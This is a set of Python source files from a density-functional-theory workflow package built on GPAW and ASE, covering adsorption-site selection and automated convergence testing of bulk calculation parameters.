parprint('Ads Site(Ang)\t\t\tAds Energy(eV)',file=f)
f.close()
for file_loc in fils:
ads_slab=read(file_loc)
# kpts=kdens2mp(ads_slab,kptdensity=k_density,even=True)
slab_length=ads_slab.cell.lengths()
slab_long_short_ratio=max(slab_length)/min(slab_length)
if calc_dict['spinpol']:
slab_formula=ads_slab.get_chemical_symbols()
magmom_ls=np.append(magmom,np.mean(magmom))
magmom_ls[slab_formula.index(ads)]=0
ads_slab.set_initial_magnetic_moments(magmom_ls)
if slab_long_short_ratio > 15:
with paropen(rep_location,'a') as f:
parprint('WARNING: slab long-short side ratio is'+str(slab_long_short_ratio),file=f)
parprint('Consider change the mixer setting, if not converged.',fiile=f)
f.close()
ads_slab.set_calculator(gpaw_calc)
location='/'.join(file_loc.split('/')[:-1])
opt.surf_relax(ads_slab, location, fmax=solver_fmax, maxstep=solver_maxstep, replay_traj=None)
ads_dict[location]=ads_slab.get_potential_energy()-(opt_slab.get_potential_energy()+ads_pot_e)
if temp_print:
with paropen(rep_location,'a') as f:
parprint(str(file_loc.split('/')[-2])+'\t\t\t'+str(np.round(ads_dict[location],decimals=5)),file=f)
f.close()
ads_dict_sorted=sorted(ads_dict,key=ads_dict.get)
lowest_ads_e_slab=read(ads_dict_sorted[0]+'/slab.traj')
ads_db=connect('final_database/ads'+str(size)+'.db')
id=ads_db.reserve(name=element+'('+struc+')')
if id is None:
id=ads_db.get(name=element+'('+struc+')').id
ads_db.update(id=id,atoms=lowest_ads_e_slab,name=element+'('+struc+')',clean_slab_pot_e=opt_slab.get_potential_energy(),ads_pot_e=ads_dict[ads_dict_sorted[0]])
else:
ads_db.write(lowest_ads_e_slab,id=id,name=element+'('+struc+')',clean_slab_pot_e=opt_slab.get_potential_energy(),ads_pot_e=ads_dict[ads_dict_sorted[0]])
with paropen(rep_location,'a') as f:
parprint('Computation Complete. Selected ads site is: '+ads_dict_sorted[0].split('/')[-1],file=f) |
kianpu34593/base4gpaw | tutorial/Cu_ads.py | from actgpaw import ads_selector
from gpaw import GPAW, MixerSum, Mixer, MixerDif, Davidson
from ase.db import connect
# specify the material and miller index of interest
element = "Cu_mp-30"
struc = "111"
# read the optimized conventional cell in the database
element_surf = connect("final_database/surf.db").get(name=element + "(" + struc + ")")
h = element_surf.h
xc = element_surf.xc
sw = element_surf.sw
spin = element_surf.spin
kpts = [int(i) for i in (element_surf.kpts).split(",")]
# set up the calculator
calc = GPAW(
xc=xc,
h=h,
kpts=kpts,
symmetry={"point_group": False},
eigensolver=Davidson(3),
mixer=Mixer(beta=0.05, nmaxold=5, weight=50),
spinpol=spin,
maxiter=333,
occupations={"name": "fermi-dirac", "width": sw},
poissonsolver={"dipolelayer": "xy"},
)
# call ads_selector module
ads_selector.ads_auto_select(
element,
struc,
calc,
ads="Li", # specify adsorbate
ads_pot_e=-1.89678, # adsorbate energy
size="1x1", # specify the size of the supercell (xy)
temp_print=True, # print out the convergence process
)
|
kianpu34593/base4gpaw | BASIC/bulk_autoconv.py | from gpaw import GPAW,Mixer,Davidson
from ase.build import bulk
from ase.db import connect
import os
import BASIC.optimizer as opt
from ase.parallel import parprint
import numpy as np
import sys
from ase.io import read, write
from ase.parallel import paropen, parprint, world
from ase.calculators.calculator import kptdensity2monkhorstpack as kdens2mp
def bulk_auto_conv(element,gpaw_calc,
rela_tol=10*10**(-3),
init_magmom=0,
temp_print=True,
solver_step=0.05,
solver_fmax=0.01):
rep_location=(element+'/'+'bulk'+'/'+'results_report.txt')
calc_dict=gpaw_calc.__dict__['parameters']
#initialize the kpts from the k_density
orig_atom=bulk_builder(element)
if world.rank==0 and os.path.isfile(rep_location):
os.remove(rep_location)
with paropen(rep_location,'a') as f:
parprint('Initial Parameters:',file=f)
parprint('\t'+'Materials: '+element,file=f)
parprint('\t'+'Lattice constants: '+str(np.round(orig_atom.get_cell_lengths_and_angles()[:3],decimals=5))+'Ang',file=f)
parprint('\t'+'Lattice angles: '+str(np.round(orig_atom.get_cell_lengths_and_angles()[3:],decimals=5))+'Degree',file=f)
parprint('\t'+'xc: '+calc_dict['xc'],file=f)
parprint('\t'+'h: '+str(calc_dict['h']),file=f)
parprint('\t'+'kpts: '+str(calc_dict['kpts']),file=f)
parprint('\t'+'sw: '+str(calc_dict['occupations']),file=f)
parprint('\t'+'spin polarized: '+str(calc_dict['spinpol']),file=f)
if calc_dict['spinpol']:
parprint('\t'+'magmom: '+str(init_magmom),file=f)
parprint('\t'+'rela_tol: '+str(rela_tol)+'eV',file=f)
f.close()
#connecting to databse
db_h=connect(element+"/"+'bulk'+'/'+'grid_converge.db')
db_k=connect(element+"/"+'bulk'+'/'+'kpts_converge.db')
db_sw=connect(element+"/"+'bulk'+'/'+'sw_converge.db')
db_final=connect('final_database'+'/'+'bulk.db')
diff_primary=100
diff_second=100
grid_iters=len(db_h)
h_ls=[]
if grid_iters>=2:
for i in range(2,grid_iters):
fst=db_h.get_atoms(id=i-1)
snd=db_h.get_atoms(id=i)
trd=db_h.get_atoms(id=i+1)
diff_primary=max(abs(snd.get_potential_energy()-fst.get_potential_energy()),
abs(trd.get_potential_energy()-fst.get_potential_energy()))
diff_second=abs(trd.get_potential_energy()-snd.get_potential_energy())
if temp_print == True:
temp_output_printer(db_h,i,'h',rep_location)
if grid_iters>0:
for j in range(1,grid_iters+1):
h_ls.append(db_h.get(j).h)
#start with grid spacing convergence
while (diff_primary>rela_tol or diff_second>rela_tol) and grid_iters <= 6:
atoms=bulk_builder(element)
if calc_dict['spinpol']:
atoms.set_initial_magnetic_moments(init_magmom*np.ones(len(atoms)))
atoms.set_calculator(gpaw_calc)
opt.optimize_bulk(atoms,step=solver_step,fmax=solver_fmax,location=element+"/"+'bulk'+'/'+'results_h',extname='{}'.format(calc_dict['h']))
db_h.write(atoms,h=calc_dict['h'])
if grid_iters>=2:
fst=db_h.get_atoms(id=grid_iters-1)
snd=db_h.get_atoms(id=grid_iters)
trd=db_h.get_atoms(id=grid_iters+1)
diff_primary=max(abs(snd.get_potential_energy()-fst.get_potential_energy()),
abs(trd.get_potential_energy()-fst.get_potential_energy()))
diff_second=abs(trd.get_potential_energy()-snd.get_potential_energy())
if temp_print == True:
temp_output_printer(db_h,grid_iters,'h',rep_location)
h_ls.append(calc_dict['h'])
gpaw_calc.__dict__['parameters']['h']=np.round(calc_dict['h']-0.02,decimals=2)
calc_dict=gpaw_calc.__dict__['parameters']
grid_iters+=1
if grid_iters>=6:
if diff_primary>rela_tol or diff_second>rela_tol:
with paropen(rep_location,'a') as f:
parprint("WARNING: Max GRID iterations reached! System may not be converged.",file=f)
parprint("Computation Suspended!",file=f)
f.close()
sys.exit()
h=h_ls[-3]
gpaw_calc.__dict__['parameters']['h']=h
calc_dict=gpaw_calc.__dict__['parameters']
#kpts convergence
diff_primary=100
diff_second=100
k_iters=len(db_k)+1
k_ls=[calc_dict['kpts']]
k_density=mp2kdens(db_h.get_atoms(len(db_h)-2),calc_dict['kpts'])
db_k.write(db_h.get_atoms(len(db_h)-2),k_density=','.join(map(str, k_density)),kpts=str(','.join(map(str, calc_dict['kpts']))))
while (diff_primary>rela_tol or diff_second>rela_tol) and k_iters <= 6:
atoms=bulk_builder(element)
kpts=[int(i+2) for i in calc_dict['kpts']]
k_density=mp2kdens(atoms,kpts)
gpaw_calc.__dict__['parameters']['kpts']=kpts
calc_dict=gpaw_calc.__dict__['parameters']
atoms=bulk_builder(element)
if calc_dict['spinpol']:
atoms.set_initial_magnetic_moments(init_magmom*np.ones(len(atoms)))
atoms.set_calculator(gpaw_calc)
opt.optimize_bulk(atoms,step=solver_step,fmax=solver_fmax,location=element+"/"+'bulk'+'/'+'results_k',extname='{}'.format(calc_dict['kpts'][0]))
db_k.write(atoms,k_density=','.join(map(str, k_density)),kpts=str(','.join(map(str, calc_dict['kpts']))))
if k_iters>=2:
fst=db_k.get_atoms(id=k_iters-1)
snd=db_k.get_atoms(id=k_iters)
trd=db_k.get_atoms(id=k_iters+1)
diff_primary=max(abs(snd.get_potential_energy()-fst.get_potential_energy()),
abs(trd.get_potential_energy()-fst.get_potential_energy()))
diff_second=abs(trd.get_potential_energy()-snd.get_potential_energy())
if temp_print == True:
temp_output_printer(db_k,k_iters,'kpts',rep_location)
k_iters+=1
k_ls.append(kpts)
if k_iters>=6:
if diff_primary>rela_tol or diff_second>rela_tol:
with paropen(rep_location,'a') as f:
parprint("WARNING: Max K_DENSITY iterations reached! System may not be converged.",file=f)
parprint("Computation Suspended!",file=f)
f.close()
sys.exit()
kpts=k_ls[-3]
gpaw_calc.__dict__['parameters']['kpts']=kpts
calc_dict=gpaw_calc.__dict__['parameters']
#smearing-width convergence test
diff_primary=100
diff_second=100
sw_iters=1
sw_ls=[calc_dict['occupations']['width']]
db_sw.write(db_k.get_atoms(len(db_k)-2),sw=calc_dict['occupations']['width'])
while (diff_primary>rela_tol or diff_second>rela_tol) and sw_iters <= 6:
atoms=bulk_builder(element)
gpaw_calc.__dict__['parameters']['occupations']['width']=calc_dict['occupations']['width']/2
calc_dict=gpaw_calc.__dict__['parameters']
atoms=bulk_builder(element)
if calc_dict['spinpol']:
atoms.set_initial_magnetic_moments(init_magmom*np.ones(len(atoms)))
atoms.set_calculator(gpaw_calc)
opt.optimize_bulk(atoms,step=solver_step,fmax=solver_fmax,location=element+"/"+'bulk'+'/'+'results_sw',extname='{}'.format(calc_dict['occupations']['width']))
db_sw.write(atoms,sw=calc_dict['occupations']['width'])
if sw_iters>=2:
fst=db_sw.get_atoms(id=sw_iters-1)
snd=db_sw.get_atoms(id=sw_iters)
trd=db_sw.get_atoms(id=sw_iters+1)
diff_primary=max(abs(snd.get_potential_energy()-fst.get_potential_energy()),
abs(trd.get_potential_energy()-fst.get_potential_energy()))
diff_second=abs(trd.get_potential_energy()-snd.get_potential_energy())
if temp_print == True:
temp_output_printer(db_sw,sw_iters,'sw',rep_location)
sw_iters+=1
sw_ls.append(calc_dict['occupations']['width'])
if sw_iters>=6:
if diff_primary>rela_tol or diff_second>rela_tol:
with paropen(rep_location,'a') as f:
parprint("WARNING: Max SMEARING-WIDTH iterations reached! System may not be converged.",file=f)
parprint("Computation Suspended!",file=f)
f.close()
sys.exit()
sw=sw_ls[-3]
gpaw_calc.__dict__['parameters']['occupations']['width']=sw
calc_dict=gpaw_calc.__dict__['parameters']
final_atom=db_sw.get_atoms(id=len(db_sw)-2)
k_density=mp2kdens(final_atom,calc_dict['kpts'])[0]
if calc_dict['spinpol']:
final_magmom=final_atom.get_magnetic_moments()
#writing final_atom to final_db
id=db_final.reserve(name=element)
if id is None:
id=db_final.get(name=element).id
db_final.update(id=id,atoms=final_atom,name=element,
h=calc_dict['h'],sw=calc_dict['occupations']['width'],xc=calc_dict['xc'],spin=calc_dict['spinpol'],
k_density=k_density,kpts=str(','.join(map(str, calc_dict['kpts']))))
else:
db_final.write(final_atom,id=id,name=element,
h=calc_dict['h'],sw=calc_dict['occupations']['width'],xc=calc_dict['xc'],spin=calc_dict['spinpol'],
k_density=k_density,kpts=str(','.join(map(str, calc_dict['kpts']))))
with paropen(rep_location,'a') as f:
parprint('Final Parameters:',file=f)
parprint('\t'+'h: '+str(calc_dict['h']),file=f)
parprint('\t'+'k_density: '+str(k_density),file=f)
parprint('\t'+'kpts: '+str(calc_dict['kpts']),file=f)
parprint('\t'+'sw: '+str(calc_dict['occupations']['width']),file=f)
if calc_dict['spinpol']:
parprint('\t'+'magmom: '+str(final_magmom),file=f)
parprint('Final Output: ',file=f)
parprint('\t'+'Lattice constants: '+str(np.round(final_atom.get_cell_lengths_and_angles()[:3],decimals=5))+'Ang',file=f)
parprint('\t'+'Lattice angles: '+str(np.round(final_atom.get_cell_lengths_and_angles()[3:],decimals=5))+'Degree',file=f)
parprint('\t'+'pot_e: '+str(np.round(final_atom.get_potential_energy(),decimals=5))+'eV',file=f)
f.close()
def bulk_builder(element):
location='orig_cif_data'+'/'+element+'.cif'
atoms=read(location)
return atoms
def temp_output_printer(db,iters,key,location):
fst_r=db.get(iters-1)
snd_r=db.get(iters)
trd_r=db.get(iters+1)
with paropen(location,'a') as f:
parprint('Optimizing parameter: '+key,file=f)
parprint('\t'+'1st: '+str(fst_r[key])+' 2nd: '+str(snd_r[key])+' 3rd: '+str(trd_r[key]),file=f)
parprint('\t'+'2nd-1st: '+str(np.round(abs(snd_r['energy']-fst_r['energy']),decimals=5))+'eV',file=f)
parprint('\t'+'3rd-1st: '+str(np.round(abs(trd_r['energy']-fst_r['energy']),decimals=5))+'eV',file=f)
parprint('\t'+'3rd-2nd: '+str(np.round(abs(trd_r['energy']-snd_r['energy']),decimals=5))+'eV',file=f)
f.close()
def mp2kdens(atoms,kpts):
recipcell=atoms.get_reciprocal_cell()
kptdensity_ls=[]
for i in range(len(kpts)):
kptdensity = kpts[i]/(2 * np.pi * np.sqrt((recipcell[i]**2).sum()))
kptdensity_ls.append(np.round(kptdensity,decimals=4))
return kptdensity_ls |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.